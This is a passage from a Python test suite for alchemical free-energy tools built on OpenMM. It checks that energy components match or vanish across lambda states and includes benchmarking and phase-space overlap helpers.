assert nn_reciprocal_energy == unmod_nn_reciprocal_energy == 0.0 * energy_unit
assert aa_reciprocal_energy == unmod_aa_reciprocal_energy == 0.0 * energy_unit
assert na_reciprocal_energy == unmod_na_reciprocal_energy == 0.0 * energy_unit
# Check forces other than nonbonded
# ----------------------------------
for force_name in ['HarmonicBondForce', 'HarmonicAngleForce', 'PeriodicTorsionForce',
'GBSAOBCForce', 'CustomGBForce']:
alchemical_forces_energies = [energy for label, energy in energy_components.items() if force_name in label]
reference_force_energy = compute_force_energy(reference_system, positions, force_name)
# There should be no force in the alchemical system if force_name is missing from the reference
if reference_force_energy is None:
assert len(alchemical_forces_energies) == 0, str(alchemical_forces_energies)
continue
# Check that the energies match
tot_alchemical_forces_energies = 0.0 * energy_unit
for energy in alchemical_forces_energies:
tot_alchemical_forces_energies += energy
assert_almost_equal(reference_force_energy, tot_alchemical_forces_energies,
'{} energy '.format(force_name))
def check_multi_noninteracting_energy_components(reference_system, alchemical_system, alchemical_regions, positions):
"""wrapper around check_noninteracting_energy_components for multiple regions
Parameters
----------
reference_system : simtk.openmm.System
The reference system (not alchemically modified).
alchemical_system : simtk.openmm.System
The alchemically modified system to test.
alchemical_regions : AlchemicalRegion.
The alchemically modified region.
positions : n_particlesx3 array-like of simtk.openmm.unit.Quantity
The positions to test (units of length).
"""
for region in alchemical_regions:
check_noninteracting_energy_components(reference_system, alchemical_system, region, positions, True)
def check_noninteracting_energy_components(reference_system, alchemical_system, alchemical_regions, positions, multi_regions=False):
"""Check non-interacting energy components are zero when appropriate.
Parameters
----------
reference_system : simtk.openmm.System
The reference system (not alchemically modified).
alchemical_system : simtk.openmm.System
The alchemically modified system to test.
alchemical_regions : AlchemicalRegion.
The alchemically modified region.
positions : n_particlesx3 array-like of simtk.openmm.unit.Quantity
The positions to test (units of length).
multi_regions : boolean
Indicates if mutiple regions are being tested
"""
alchemical_system = copy.deepcopy(alchemical_system)
is_exact_pme = is_alchemical_pme_treatment_exact(alchemical_system)
# Set state to non-interacting.
alchemical_state = AlchemicalState.from_system(alchemical_system, parameters_name_suffix=alchemical_regions.name)
alchemical_state.set_alchemical_parameters(0.0)
energy_components = AbsoluteAlchemicalFactory.get_energy_components(alchemical_system, alchemical_state,
positions, platform=GLOBAL_ALCHEMY_PLATFORM)
def assert_zero_energy(label):
# Handle multiple alchemical regions.
if multi_regions:
label = label + ' for region ' + alchemical_regions.name
# Testing energy component of each region.
print('testing {}'.format(label))
value = energy_components[label]
assert abs(value / GLOBAL_ENERGY_UNIT) == 0.0, ("'{}' should have zero energy in annihilated alchemical"
" state, but energy is {}").format(label, str(value))
# Check that non-alchemical/alchemical particle interactions and 1,4 exceptions have been annihilated
assert_zero_energy('alchemically modified BondForce for non-alchemical/alchemical sterics exceptions')
assert_zero_energy('alchemically modified NonbondedForce for non-alchemical/alchemical sterics')
if is_exact_pme:
assert 'alchemically modified NonbondedForce for non-alchemical/alchemical electrostatics' not in energy_components
assert 'alchemically modified BondForce for non-alchemical/alchemical electrostatics exceptions' not in energy_components
else:
assert_zero_energy('alchemically modified NonbondedForce for non-alchemical/alchemical electrostatics')
assert_zero_energy('alchemically modified BondForce for non-alchemical/alchemical electrostatics exceptions')
# Check that alchemical/alchemical particle interactions and 1,4 exceptions have been annihilated
if alchemical_regions.annihilate_sterics:
assert_zero_energy('alchemically modified NonbondedForce for alchemical/alchemical sterics')
assert_zero_energy('alchemically modified BondForce for alchemical/alchemical sterics exceptions')
if alchemical_regions.annihilate_electrostatics:
if is_exact_pme:
assert 'alchemically modified NonbondedForce for alchemical/alchemical electrostatics' not in energy_components
assert 'alchemically modified BondForce for alchemical/alchemical electrostatics exceptions' not in energy_components
else:
assert_zero_energy('alchemically modified NonbondedForce for alchemical/alchemical electrostatics')
assert_zero_energy('alchemically modified BondForce for alchemical/alchemical electrostatics exceptions')
# Check valence terms
for force_name in ['HarmonicBondForce', 'HarmonicAngleForce', 'PeriodicTorsionForce']:
force_label = 'alchemically modified ' + force_name
if force_label in energy_components:
assert_zero_energy(force_label)
# Check implicit solvent force.
for force_name in ['CustomGBForce', 'GBSAOBCForce']:
label = 'alchemically modified ' + force_name
# Check if the system has an implicit solvent force.
try:
alchemical_energy = energy_components[label]
except KeyError: # No implicit solvent.
continue
# If all alchemical particles are modified, the alchemical energy should be zero.
if len(alchemical_regions.alchemical_atoms) == reference_system.getNumParticles():
assert_zero_energy(label)
continue
# Otherwise compare the alchemical energy with a
# reference system with only non-alchemical particles.
# Find implicit solvent force in reference system.
for reference_force in reference_system.getForces():
if reference_force.__class__.__name__ == force_name:
break
system = openmm.System()
force = reference_force.__class__()
# For custom GB forces, we need to copy all computed values,
# energy terms, parameters, tabulated functions and exclusions.
if isinstance(force, openmm.CustomGBForce):
for index in range(reference_force.getNumPerParticleParameters()):
name = reference_force.getPerParticleParameterName(index)
force.addPerParticleParameter(name)
for index in range(reference_force.getNumComputedValues()):
computed_value = reference_force.getComputedValueParameters(index)
force.addComputedValue(*computed_value)
for index in range(reference_force.getNumEnergyTerms()):
energy_term = reference_force.getEnergyTermParameters(index)
force.addEnergyTerm(*energy_term)
for index in range(reference_force.getNumGlobalParameters()):
name = reference_force.getGlobalParameterName(index)
default_value = reference_force.getGlobalParameterDefaultValue(index)
force.addGlobalParameter(name, default_value)
for function_index in range(reference_force.getNumTabulatedFunctions()):
name = reference_force.getTabulatedFunctionName(function_index)
function = reference_force.getTabulatedFunction(function_index)
function_copy = copy.deepcopy(function)
force.addTabulatedFunction(name, function_copy)
for exclusion_index in range(reference_force.getNumExclusions()):
particles = reference_force.getExclusionParticles(exclusion_index)
force.addExclusion(*particles)
# Create a system with only the non-alchemical particles.
for particle_index in range(reference_system.getNumParticles()):
if particle_index not in alchemical_regions.alchemical_atoms:
# Add particle to System.
mass = reference_system.getParticleMass(particle_index)
system.addParticle(mass)
# Add particle to Force..
parameters = reference_force.getParticleParameters(particle_index)
try: # GBSAOBCForce
force.addParticle(*parameters)
except (TypeError, NotImplementedError): # CustomGBForce
force.addParticle(parameters)
system.addForce(force)
# Get positions for all non-alchemical particles.
non_alchemical_positions = [pos for i, pos in enumerate(positions)
if i not in alchemical_regions.alchemical_atoms]
# Compute reference force energy.
reference_force_energy = compute_force_energy(system, non_alchemical_positions, force_name)
assert_almost_equal(reference_force_energy, alchemical_energy,
'reference {}, alchemical {}'.format(reference_force_energy, alchemical_energy))
def check_split_force_groups(system, region_names=None):
"""Check that force groups are split correctly."""
if region_names is None:
region_names = []
# Separate forces groups by lambda parameters that AlchemicalState supports.
for region in region_names:
force_groups_by_lambda = {}
lambdas_by_force_group = {}
for force, lambda_name, _ in AlchemicalState._get_system_controlled_parameters(
system, parameters_name_suffix=region):
force_group = force.getForceGroup()
try:
force_groups_by_lambda[lambda_name].add(force_group)
except KeyError:
force_groups_by_lambda[lambda_name] = {force_group}
try:
lambdas_by_force_group[force_group].add(lambda_name)
except KeyError:
lambdas_by_force_group[force_group] = {lambda_name}
# Check that force group 0 doesn't hold alchemical forces.
assert 0 not in force_groups_by_lambda
# There are as many alchemical force groups as not-None lambda variables.
alchemical_state = AlchemicalState.from_system(system, parameters_name_suffix=region)
valid_lambdas = {lambda_name for lambda_name in alchemical_state._get_controlled_parameters(parameters_name_suffix=region)
if getattr(alchemical_state, lambda_name) is not None}
assert valid_lambdas == set(force_groups_by_lambda.keys())
# Check that force groups and lambda variables are in 1-to-1 correspondence.
assert len(force_groups_by_lambda) == len(lambdas_by_force_group)
for d in [force_groups_by_lambda, lambdas_by_force_group]:
for value in d.values():
assert len(value) == 1
# With exact treatment of PME, the NonbondedForce must
# be in the lambda_electrostatics force group.
if is_alchemical_pme_treatment_exact(system):
force_idx, nonbonded_force = forces.find_forces(system, openmm.NonbondedForce, only_one=True)
assert force_groups_by_lambda['lambda_electrostatics_{}'.format(region)] == {nonbonded_force.getForceGroup()}
# =============================================================================
# BENCHMARKING AND DEBUG FUNCTIONS
# =============================================================================
def benchmark(reference_system, alchemical_regions, positions, nsteps=500,
timestep=1.0*unit.femtoseconds):
"""
Benchmark performance of alchemically modified system relative to original system.
Parameters
----------
reference_system : simtk.openmm.System
The reference System object to compare with.
alchemical_regions : AlchemicalRegion
The region to alchemically modify.
positions : n_particlesx3 array-like of simtk.unit.Quantity
The initial positions (units of distance).
nsteps : int, optional
Number of molecular dynamics steps to use for benchmarking (default is 500).
timestep : simtk.unit.Quantity, optional
Timestep to use for benchmarking (units of time, default is 1.0*unit.femtoseconds).
"""
timer = utils.Timer()
# Create the perturbed system.
factory = AbsoluteAlchemicalFactory()
timer.start('Create alchemical system')
alchemical_system = factory.create_alchemical_system(reference_system, alchemical_regions)
timer.stop('Create alchemical system')
# Create an alchemically-perturbed state corresponding to nearly fully-interacting.
# NOTE: We use a lambda slightly smaller than 1.0 because the AbsoluteAlchemicalFactory
# may not use Custom*Force softcore versions if lambda = 1.0 identically.
alchemical_state = AlchemicalState.from_system(alchemical_system)
alchemical_state.set_alchemical_parameters(1.0 - 1.0e-6)
# Create integrators.
reference_integrator = openmm.VerletIntegrator(timestep)
alchemical_integrator = openmm.VerletIntegrator(timestep)
# Create contexts for sampling.
if GLOBAL_ALCHEMY_PLATFORM:
reference_context = openmm.Context(reference_system, reference_integrator, GLOBAL_ALCHEMY_PLATFORM)
alchemical_context = openmm.Context(alchemical_system, alchemical_integrator, GLOBAL_ALCHEMY_PLATFORM)
else:
reference_context = openmm.Context(reference_system, reference_integrator)
alchemical_context = openmm.Context(alchemical_system, alchemical_integrator)
reference_context.setPositions(positions)
alchemical_context.setPositions(positions)
# Make sure all kernels are compiled.
reference_integrator.step(1)
alchemical_integrator.step(1)
# Run simulations.
print('Running reference system...')
timer.start('Run reference system')
reference_integrator.step(nsteps)
timer.stop('Run reference system')
print('Running alchemical system...')
timer.start('Run alchemical system')
alchemical_integrator.step(nsteps)
timer.stop('Run alchemical system')
print('Done.')
timer.report_timing()
def benchmark_alchemy_from_pdb():
"""CLI entry point for benchmarking alchemical performance from a PDB file.
"""
logging.basicConfig(level=logging.DEBUG)
import mdtraj
import argparse
from simtk.openmm import app
parser = argparse.ArgumentParser(description='Benchmark performance of alchemically-modified system.')
parser.add_argument('-p', '--pdb', metavar='PDBFILE', type=str, action='store', required=True,
help='PDB file to benchmark; only protein forcefields supported for now (no small molecules)')
parser.add_argument('-s', '--selection', metavar='SELECTION', type=str, action='store', default='not water',
help='MDTraj DSL describing alchemical region (default: "not water")')
parser.add_argument('-n', '--nsteps', metavar='STEPS', type=int, action='store', default=1000,
help='Number of benchmarking steps (default: 1000)')
args = parser.parse_args()
# Read the PDB file
print('Loading PDB file...')
pdbfile = app.PDBFile(args.pdb)
print('Loading forcefield...')
forcefield = app.ForceField('amber99sbildn.xml', 'tip3p.xml')
print('Adding missing hydrogens...')
modeller = app.Modeller(pdbfile.topology, pdbfile.positions)
modeller.addHydrogens(forcefield)
print('Creating System...')
reference_system = forcefield.createSystem(modeller.topology, nonbondedMethod=app.PME)
# Minimize
print('Minimizing...')
positions = minimize(reference_system, modeller.positions)
# Select alchemical regions
mdtraj_topology = mdtraj.Topology.from_openmm(modeller.topology)
alchemical_atoms = mdtraj_topology.select(args.selection)
alchemical_region = AlchemicalRegion(alchemical_atoms=alchemical_atoms)
print('There are %d atoms in the alchemical region.' % len(alchemical_atoms))
# Benchmark
print('Benchmarking...')
benchmark(reference_system, alchemical_region, positions, nsteps=args.nsteps, timestep=1.0*unit.femtoseconds)
def overlap_check(reference_system, alchemical_system, positions, nsteps=50, nsamples=200,
cached_trajectory_filename=None, name=""):
"""
Test overlap between reference system and alchemical system by running a short simulation.
Parameters
----------
reference_system : simtk.openmm.System
The reference System object to compare with.
alchemical_system : simtk.openmm.System
Alchemically-modified system.
positions : n_particlesx3 array-like of simtk.unit.Quantity
The initial positions (units of distance).
nsteps : int, optional
Number of molecular dynamics steps between samples (default is 50).
nsamples : int, optional
Number of samples to collect (default is 100).
cached_trajectory_filename : str, optional, default=None
If not None, this file will be used to cache intermediate results with pickle.
name : str, optional, default=None
Name of test system being evaluated.
"""
temperature = 300.0 * unit.kelvin
pressure = 1.0 * unit.atmospheres
collision_rate = 5.0 / unit.picoseconds
timestep = 2.0 * unit.femtoseconds
kT = kB * temperature
# Minimize
positions = minimize(reference_system, positions)
# Add a barostat if possible.
reference_system = copy.deepcopy(reference_system)
if reference_system.usesPeriodicBoundaryConditions():
reference_system.addForce(openmm.MonteCarloBarostat(pressure, temperature))
# Create integrators.
reference_integrator = openmm.LangevinIntegrator(temperature, collision_rate, timestep)
alchemical_integrator = openmm.VerletIntegrator(timestep)
# Create contexts.
reference_context = create_context(reference_system, reference_integrator)
alchemical_context = create_context(alchemical_system, alchemical_integrator)
# Initialize data structure or load if from cache.
# du_n[n] is the potential energy difference of sample n.
if cached_trajectory_filename is not None:
try:
with open(cached_trajectory_filename, 'rb') as f:
data = pickle.load(f)
except FileNotFoundError:
data = dict(du_n=[])
# Create directory if it doesn't exist.
directory = os.path.dirname(cached_trajectory_filename)
if not os.path.exists(directory):
os.makedirs(directory)
else:
positions = data['positions']
reference_context.setPeriodicBoxVectors(*data['box_vectors'])
else:
data = dict(du_n=[])
# Collect simulation data.
iteration = len(data['du_n'])
reference_context.setPositions(positions)
print()
for sample in range(iteration, nsamples):
print('\rSample {}/{}'.format(sample+1, nsamples), end='')
sys.stdout.flush()
# Run dynamics.
reference_integrator.step(nsteps)
# Get reference energies.
reference_state = reference_context.getState(getEnergy=True, getPositions=True)
reference_potential = reference_state.getPotentialEnergy()
if np.isnan(reference_potential/kT):
raise Exception("Reference potential is NaN")
# Get alchemical energies.
alchemical_context.setPeriodicBoxVectors(*reference_state.getPeriodicBoxVectors())
alchemical_context.setPositions(reference_state.getPositions(asNumpy=True))
alchemical_state = alchemical_context.getState(getEnergy=True)
alchemical_potential = alchemical_state.getPotentialEnergy()
if np.isnan(alchemical_potential/kT):
raise Exception("Alchemical potential is NaN")
# Update and cache data.
data['du_n'].append((alchemical_potential - reference_potential) / kT)
if cached_trajectory_filename is not None:
# Save only last iteration positions and vectors.
data['positions'] = reference_state.getPositions()
data['box_vectors'] = reference_state.getPeriodicBoxVectors()
with open(cached_trajectory_filename, 'wb') as f:
pickle.dump(data, f)
# Discard data to equilibration and subsample.
du_n = np.array(data['du_n'])
from pymbar import timeseries, EXP
t0, g, Neff = timeseries.detectEquilibration(du_n)
indices = timeseries.subsampleCorrelatedData(du_n, g=g)
du_n = du_n[indices]
# Compute statistics.
DeltaF, dDeltaF = EXP(du_n)
# Raise an exception if the error is larger than 3kT.
MAX_DEVIATION = 3.0 # kT
report = ('\nDeltaF = {:12.3f} +- {:12.3f} kT ({:3.2f} samples, g = {:3.1f}); '
'du mean {:.3f} kT stddev {:.3f} kT').format(DeltaF, dDeltaF, Neff, g, du_n.mean(), du_n.std())
print(report)
if dDeltaF > MAX_DEVIATION:
raise Exception(report)
def rstyle(ax):
"""Styles x,y axes to appear like ggplot2
Must be called after all plot and axis manipulation operations have been
carried out (needs to know final tick spacing)
From:
http://nbviewer.ipython.org/github/wrobstory/climatic/blob/master/examples/ggplot_styling_for_matplotlib.ipynb
"""
import pylab
import matplotlib
import matplotlib.pyplot as plt
#Set the style of the major and minor grid lines, filled blocks
ax.grid(True, 'major', color='w', linestyle='-', linewidth=1.4)
ax.grid(True, 'minor', color='0.99', linestyle='-', linewidth=0.7)
ax.patch.set_facecolor('0.90')
ax.set_axisbelow(True)
#Set minor tick spacing to 1/2 of the major ticks
ax.xaxis.set_minor_locator((pylab.MultipleLocator((plt.xticks()[0][1] - plt.xticks()[0][0]) / 2.0)))
ax.yaxis.set_minor_locator((pylab.MultipleLocator((plt.yticks()[0][1] - plt.yticks()[0][0]) / 2.0)))
#Remove axis border
for child in ax.get_children():
if isinstance(child, matplotlib.spines.Spine):
child.set_alpha(0)
#Restyle the tick lines
for line in ax.get_xticklines() + ax.get_yticklines():
line.set_markersize(5)
line.set_color("gray")
line.set_markeredgewidth(1.4)
#Remove the minor tick lines
for line in (ax.xaxis.get_ticklines(minor=True) +
ax.yaxis.get_ticklines(minor=True)):
line.set_markersize(0)
#Only show bottom left ticks, pointing out of axis
plt.rcParams['xtick.direction'] = 'out'
plt.rcParams['ytick.direction'] = 'out'
ax.xaxis.set_ticks_position('bottom')
ax.yaxis.set_ticks_position('left')
def lambda_trace(reference_system, alchemical_regions, positions, nsteps=100):
"""
Compute potential energy as a function of lambda.
"""
# Create a factory to produce alchemical intermediates.
factory = AbsoluteAlchemicalFactory()
alchemical_system = factory.create_alchemical_system(reference_system, alchemical_regions)
alchemical_state = AlchemicalState.from_system(alchemical_system)
# Take equally-sized steps.
delta = 1.0 / nsteps
# Compute unmodified energy.
u_original = compute_energy(reference_system, positions)
# Scan through lambda values.
lambda_i = np.zeros([nsteps+1], np.float64) # lambda values for u_i
# u_i[i] is the potential energy for lambda_i[i]
u_i = unit.Quantity(np.zeros([nsteps+1], np.float64), unit.kilocalories_per_mole)
for i in range(nsteps+1):
lambda_i[i] = 1.0-i*delta
alchemical_state.set_alchemical_parameters(lambda_i[i])
alchemical_state.apply_to_system(alchemical_system)
u_i[i] = compute_energy(alchemical_system, positions)
logger.info("{:12.9f} {:24.8f} kcal/mol".format(lambda_i[i], u_i[i] / GLOBAL_ENERGY_UNIT))
# Write figure as PDF.
from matplotlib.backends.backend_pdf import PdfPages
import matplotlib.pyplot as plt
with PdfPages('lambda-trace.pdf') as pdf:
fig = plt.figure(figsize=(10, 5))
ax = fig.add_subplot(111)
plt.plot(1, u_original / unit.kilocalories_per_mole, 'ro', label='unmodified')
plt.plot(lambda_i, u_i / unit.kilocalories_per_mole, 'k.', label='alchemical')
plt.title('T4 lysozyme L99A + p-xylene : AMBER96 + OBC GBSA')
plt.ylabel('potential (kcal/mol)')
plt.xlabel('lambda')
ax.legend()
rstyle(ax)
pdf.savefig() # saves the current figure into a pdf page
plt.close()
def generate_trace(test_system):
lambda_trace(test_system['test'].system, test_system['test'].positions, test_system['receptor_atoms'], test_system['ligand_atoms'])
# =============================================================================
# TEST ALCHEMICAL FACTORY SUITE
# =============================================================================
def test_resolve_alchemical_region():
"""Test the method AbsoluteAlchemicalFactory._resolve_alchemical_region."""
test_cases = [
(testsystems.AlanineDipeptideVacuum(), range(22), 9, 36, 48),
(testsystems.AlanineDipeptideVacuum(), range(11, 22), 4, 21, 31),
(testsystems.LennardJonesCluster(), range(27), 0, 0, 0)
]
for i, (test_case, atoms, n_bonds, n_angles, n_torsions) in enumerate(test_cases):
system = test_case.system
# Default arguments are converted to empty list.
alchemical_region = AlchemicalRegion(alchemical_atoms=atoms)
resolved_region = AbsoluteAlchemicalFactory._resolve_alchemical_region(system, alchemical_region)
for region in ['bonds', 'angles', 'torsions']:
assert getattr(resolved_region, 'alchemical_' + region) == set()
# Numpy arrays are converted to sets.
alchemical_region = AlchemicalRegion(alchemical_atoms=np.array(atoms),
alchemical_bonds=np.array(range(n_bonds)),
alchemical_angles=np.array(range(n_angles)),
alchemical_torsions=np.array(range(n_torsions)))
resolved_region = AbsoluteAlchemicalFactory._resolve_alchemical_region(system, alchemical_region)
for region in ['atoms', 'bonds', 'angles', 'torsions']:
assert isinstance(getattr(resolved_region, 'alchemical_' + region), frozenset)
# Bonds, angles and torsions are inferred correctly.
alchemical_region = AlchemicalRegion(alchemical_atoms=atoms, alchemical_bonds=True,
alchemical_angles=True, alchemical_torsions=True)
resolved_region = AbsoluteAlchemicalFactory._resolve_alchemical_region(system, alchemical_region)
for j, region in enumerate(['bonds', 'angles', 'torsions']):
assert len(getattr(resolved_region, 'alchemical_' + region)) == test_cases[i][j+2]
# An exception is if indices are not part of the system.
alchemical_region = AlchemicalRegion(alchemical_atoms=[10000000])
with nose.tools.assert_raises(ValueError):
AbsoluteAlchemicalFactory._resolve_alchemical_region(system, alchemical_region)
# An exception is raised if nothing is defined.
alchemical_region = AlchemicalRegion()
with nose.tools.assert_raises(ValueError):
AbsoluteAlchemicalFactory._resolve_alchemical_region(system, alchemical_region)
class TestAbsoluteAlchemicalFactory(object):
"""Test AbsoluteAlchemicalFactory class."""
@classmethod
def setup_class(cls):
"""Create test systems and shared objects."""
cls.define_systems()
cls.define_regions()
cls.generate_cases()
@classmethod
def define_systems(cls):
"""Create shared test systems in cls.test_systems for the test suite."""
cls.test_systems = dict()
# Basic test systems: Lennard-Jones and water particles only.
# Test also dispersion correction and switch off ("on" values
# for these options are tested in HostGuestExplicit system).
cls.test_systems['LennardJonesCluster'] = testsystems.LennardJonesCluster()
cls.test_systems['LennardJonesFluid with dispersion correction'] = \
testsystems.LennardJonesFluid(nparticles=100, dispersion_correction=True)
cls.test_systems['TIP3P WaterBox with reaction field, no switch, no dispersion correction'] = \
testsystems.WaterBox(dispersion_correction=False, switch=False, nonbondedMethod=openmm.app.CutoffPeriodic)
cls.test_systems['TIP4P-EW WaterBox and NaCl with PME'] = \
testsystems.WaterBox(nonbondedMethod=openmm.app.PME, model='tip4pew', ionic_strength=200*unit.millimolar)
# Vacuum and implicit.
cls.test_systems['AlanineDipeptideVacuum'] = testsystems.AlanineDipeptideVacuum()
cls.test_systems['AlanineDipeptideImplicit'] = testsystems.AlanineDipeptideImplicit()
cls.test_systems['TolueneImplicitOBC2'] = testsystems.TolueneImplicitOBC2()
cls.test_systems['TolueneImplicitGBn'] = testsystems.TolueneImplicitGBn()
# Explicit test system: PME and CutoffPeriodic.
#cls.test_systems['AlanineDipeptideExplicit with CutoffPeriodic'] = \
# testsystems.AlanineDipeptideExplicit(nonbondedMethod=openmm.app.CutoffPeriodic)
cls.test_systems['HostGuestExplicit with PME'] = \
testsystems.HostGuestExplicit(nonbondedMethod=openmm.app.PME)
cls.test_systems['HostGuestExplicit with CutoffPeriodic'] = \
testsystems.HostGuestExplicit(nonbondedMethod=openmm.app.CutoffPeriodic)
@classmethod
def define_regions(cls):
"""Create shared AlchemicalRegions for test systems in cls.test_regions."""
cls.test_regions = dict()
cls.test_regions['LennardJonesCluster'] = AlchemicalRegion(alchemical_atoms=range(2))
cls.test_regions['LennardJonesFluid'] = AlchemicalRegion(alchemical_atoms=range(10))
cls.test_regions['Toluene'] = AlchemicalRegion(alchemical_atoms=range(6)) # Only partially modified.
cls.test_regions['AlanineDipeptide'] = AlchemicalRegion(alchemical_atoms=range(22))
cls.test_regions['HostGuestExplicit'] = AlchemicalRegion(alchemical_atoms=range(126, 156))
cls.test_regions['TIP3P WaterBox'] = AlchemicalRegion(alchemical_atoms=range(0,3))
# Modify ions.
for atom in cls.test_systems['TIP4P-EW WaterBox and NaCl with PME'].topology.atoms():
if atom.name in ['Na', 'Cl']:
cls.test_regions['TIP4P-EW WaterBox and NaCl'] = AlchemicalRegion(alchemical_atoms=range(atom.index, atom.index+1))
break
@classmethod
def generate_cases(cls):
"""Generate all test cases in cls.test_cases combinatorially."""
cls.test_cases = dict()
direct_space_factory = AbsoluteAlchemicalFactory(alchemical_pme_treatment='direct-space',
alchemical_rf_treatment='switched')
exact_pme_factory = AbsoluteAlchemicalFactory(alchemical_pme_treatment='exact')
# We generate all possible combinations of annihilate_sterics/electrostatics
# for each test system. We also annihilate bonds, angles and torsions every
# 3 test cases so that we test it at least one for each test system and for
# each combination of annihilate_sterics/electrostatics.
n_test_cases = 0
for test_system_name, test_system in cls.test_systems.items():
# Find standard alchemical region.
for region_name, region in cls.test_regions.items():
if region_name in test_system_name:
break
assert region_name in test_system_name, test_system_name
# Find nonbonded method.
force_idx, nonbonded_force = forces.find_forces(test_system.system, openmm.NonbondedForce, only_one=True)
nonbonded_method = nonbonded_force.getNonbondedMethod()
# Create all combinations of annihilate_sterics/electrostatics.
for annihilate_sterics, annihilate_electrostatics in itertools.product((True, False), repeat=2):
# Create new region that we can modify.
test_region = region._replace(annihilate_sterics=annihilate_sterics,
annihilate_electrostatics=annihilate_electrostatics)
# Create test name.
test_case_name = test_system_name[:]
if annihilate_sterics:
test_case_name += ', annihilated sterics'
if annihilate_electrostatics:
test_case_name += ', annihilated electrostatics'
# Annihilate bonds and angles every three test_cases.
if n_test_cases % 3 == 0:
test_region = test_region._replace(alchemical_bonds=True, alchemical_angles=True,
alchemical_torsions=True)
test_case_name += ', annihilated bonds, angles and torsions'
# Add different softcore parameters every five test_cases.
if n_test_cases % 5 == 0:
test_region = test_region._replace(softcore_alpha=1.0, softcore_beta=1.0, softcore_a=1.0, softcore_b=1.0,
softcore_c=1.0, softcore_d=1.0, softcore_e=1.0, softcore_f=1.0)
test_case_name += ', modified softcore parameters'
# Pre-generate alchemical system.
alchemical_system = direct_space_factory.create_alchemical_system(test_system.system, test_region)
# Add test case.
cls.test_cases[test_case_name] = (test_system, alchemical_system, test_region)
n_test_cases += 1
# If we don't use softcore electrostatics and we annihilate charges
# we can test also exact PME treatment. We don't increase n_test_cases
# purposely to keep track of which tests are added above.
if (test_region.softcore_beta == 0.0 and annihilate_electrostatics and
nonbonded_method in [openmm.NonbondedForce.PME, openmm.NonbondedForce.Ewald]):
alchemical_system = exact_pme_factory.create_alchemical_system(test_system.system, test_region)
test_case_name += ', exact PME'
cls.test_cases[test_case_name] = (test_system, alchemical_system, test_region)
# If the test system uses reaction field replace reaction field
# of the reference system to allow comparisons.
if nonbonded_method == openmm.NonbondedForce.CutoffPeriodic:
forcefactories.replace_reaction_field(test_system.system, return_copy=False,
switch_width=direct_space_factory.switch_width)
def filter_cases(self, condition_func, max_number=None):
"""Return the list of test cases that satisfy condition_func(test_case_name)."""
if max_number is None:
max_number = len(self.test_cases)
test_cases = {}
for test_name, test_case in self.test_cases.items():
if condition_func(test_name):
test_cases[test_name] = test_case
if len(test_cases) >= max_number:
break
return test_cases
def test_split_force_groups(self):
"""Forces having different lambda variables should have a different force group."""
# Select 1 implicit, 1 explicit, and 1 exact PME explicit test case randomly.
test_cases = self.filter_cases(lambda x: 'Implicit' in x, max_number=1)
test_cases.update(self.filter_cases(lambda x: 'Explicit ' in x and 'exact PME' in x, max_number=1))
test_cases.update(self.filter_cases(lambda x: 'Explicit ' in x and 'exact PME' not in x, max_number=1))
for test_name, (test_system, alchemical_system, alchemical_region) in test_cases.items():
f = partial(check_split_force_groups, alchemical_system)
f.description = "Testing force splitting among groups of {}".format(test_name)
yield f
def test_fully_interacting_energy(self):
"""Compare the energies of reference and fully interacting alchemical system."""
for test_name, (test_system, alchemical_system, alchemical_region) in self.test_cases.items():
f = partial(compare_system_energies, test_system.system,
alchemical_system, alchemical_region, test_system.positions)
f.description = "Testing fully interacting energy of {}".format(test_name)
yield f
def test_noninteracting_energy_components(self):
"""Check all forces annihilated/decoupled when their lambda variables are zero."""
for test_name, (test_system, alchemical_system, alchemical_region) in self.test_cases.items():
f = partial(check_noninteracting_energy_components, test_system.system, alchemical_system,
alchemical_region, test_system.positions)
f.description = "Testing non-interacting energy of {}".format(test_name)
yield f
@attr('slow')
def test_fully_interacting_energy_components(self):
"""Test interacting state energy by force component."""
# This is a very expensive but very informative test. We can
# run this locally when test_fully_interacting_energies() fails.
test_cases = self.filter_cases(lambda x: 'Explicit' in x)
for test_name, (test_system, alchemical_system, alchemical_region) in test_cases.items():
f = partial(check_interacting_energy_components, test_system.system, alchemical_system,
alchemical_region, test_system.positions)
f.description = "Testing energy components of %s..." % test_name
yield f
@attr('slow')
def test_platforms(self):
"""Test interacting and noninteracting energies on all platforms."""
global GLOBAL_ALCHEMY_PLATFORM
old_global_platform = GLOBAL_ALCHEMY_PLATFORM
# Do not repeat tests on the platform already tested.
if old_global_platform is None:
default_platform_name = utils.get_fastest_platform().getName()
else:
default_platform_name = old_global_platform.getName()
platforms = [platform for platform in utils.get_available_platforms()
if platform.getName() != default_platform_name]
# Test interacting and noninteracting energies on all platforms.
for platform in platforms:
GLOBAL_ALCHEMY_PLATFORM = platform
for test_name, (test_system, alchemical_system, alchemical_region) in self.test_cases.items():
f = partial(compare_system_energies, test_system.system, alchemical_system,
alchemical_region, test_system.positions)
f.description = "Test fully interacting energy of {} on {}".format(test_name, platform.getName())
yield f
f = partial(check_noninteracting_energy_components, test_system.system, alchemical_system,
alchemical_region, test_system.positions)
f.description = "Test non-interacting energy of {} on {}".format(test_name, platform.getName())
yield f
# Restore global platform
GLOBAL_ALCHEMY_PLATFORM = old_global_platform
@attr('slow')
def test_overlap(self):
"""Tests overlap between reference and alchemical systems."""
for test_name, (test_system, alchemical_system, alchemical_region) in self.test_cases.items():
#cached_trajectory_filename = os.path.join(os.environ['HOME'], '.cache', 'alchemy', 'tests',
# test_name + '.pickle')
cached_trajectory_filename = None
f = partial(overlap_check, test_system.system, alchemical_system, test_system.positions,
cached_trajectory_filename=cached_trajectory_filename, name=test_name)
f.description = "Testing reference/alchemical overlap for {}".format(test_name)
yield f
class TestMultiRegionAbsoluteAlchemicalFactory(TestAbsoluteAlchemicalFactory):
"""Test AbsoluteAlchemicalFactory class using multiple regions."""
@classmethod
def define_systems(cls):
"""Create shared test systems in cls.test_systems for the test suite."""
cls.test_systems = dict()
# Basic test systems: Lennard-Jones and water particles only.
# Test also dispersion correction and switch off ("on" values
# for these options are tested in HostGuestExplicit system).
cls.test_systems['LennardJonesCluster'] = testsystems.LennardJonesCluster()
cls.test_systems['LennardJonesFluid with dispersion correction'] = \
testsystems.LennardJonesFluid(nparticles=100, dispersion_correction=True)
cls.test_systems['TIP3P WaterBox with reaction field, no switch, no dispersion correction'] = \
testsystems.WaterBox(dispersion_correction=False, switch=False, nonbondedMethod=openmm.app.CutoffPeriodic)
cls.test_systems['HostGuestExplicit with PME'] = \
testsystems.HostGuestExplicit(nonbondedMethod=openmm.app.PME)
cls.test_systems['HostGuestExplicit with CutoffPeriodic'] = \
